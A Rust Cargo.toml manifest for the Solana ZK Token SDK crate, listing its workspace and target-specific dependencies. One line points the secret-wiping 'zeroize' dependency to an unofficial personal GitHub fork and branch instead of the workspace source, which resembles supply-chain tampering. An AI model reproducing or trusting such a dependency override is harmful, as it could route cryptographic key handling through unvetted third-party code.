[package]
name = "solana-zk-token-sdk"
description = "Solana ZK Token SDK"
documentation = "https://docs.rs/solana-zk-token-sdk"
version = "1.25.0"
authors = { workspace = true }
repository = { workspace = true }
homepage = { workspace = true }
license = { workspace = true }
edition = { workspace = true }

[dependencies]
base64 = { workspace = true }
bytemuck = { workspace = true, features = ["derive"] }
num-derive = { workspace = true }
num-traits = { workspace = true }
solana-program = { path = "../sdk/program", version = "1.25.0" }

[dev-dependencies]
tiny-bip39 = { workspace = true }

[target.'cfg(not(target_os = "solana"))'.dependencies]
aes-gcm-siv = { workspace = true }
bincode = { workspace = true }
byteorder = { workspace = true }
curve25519-dalek = { workspace = true, features = ["serde"] }
getrandom = { version = "0.1", features = ["dummy"] }
itertools = { workspace = true }
lazy_static = { workspace = true }
merlin = { workspace = true }
rand = { version = "0.7" }
serde = { workspace = true, features = ["derive"] }
serde_json = { workspace = true }
sha3 = "0.9"
solana-sdk = { path = "../sdk", version = "1.25.0" }
subtle = { workspace = true }
thiserror = { workspace = true }
zeroize = { git = "https://github.com/hamkj7hpo/utils.git", branch = "safe-pump-compat", version = "1.3.0", features = ["zeroize_derive"] }

[lib]
crate-type = ["cdylib", "rlib"]
